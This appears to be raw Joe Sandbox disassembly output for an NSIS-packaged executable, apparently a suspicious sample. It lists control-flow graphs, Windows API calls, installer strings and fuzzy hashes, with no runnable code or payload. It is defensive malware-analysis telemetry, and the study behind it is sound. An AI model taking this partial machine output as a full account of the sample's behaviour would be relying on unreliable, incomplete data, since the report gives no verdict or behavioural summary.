                                                                                                                                                                                      control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                      • String ID: jF
                                                                                                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                      • API String ID: 608394941-2746725676
                                                                                                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,NormMimeThFreightNaturalInfrared,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,NormMimeThFreightNaturalInfrared,NormMimeThFreightNaturalInfrared,00000000,00000000,NormMimeThFreightNaturalInfrared,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429574,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
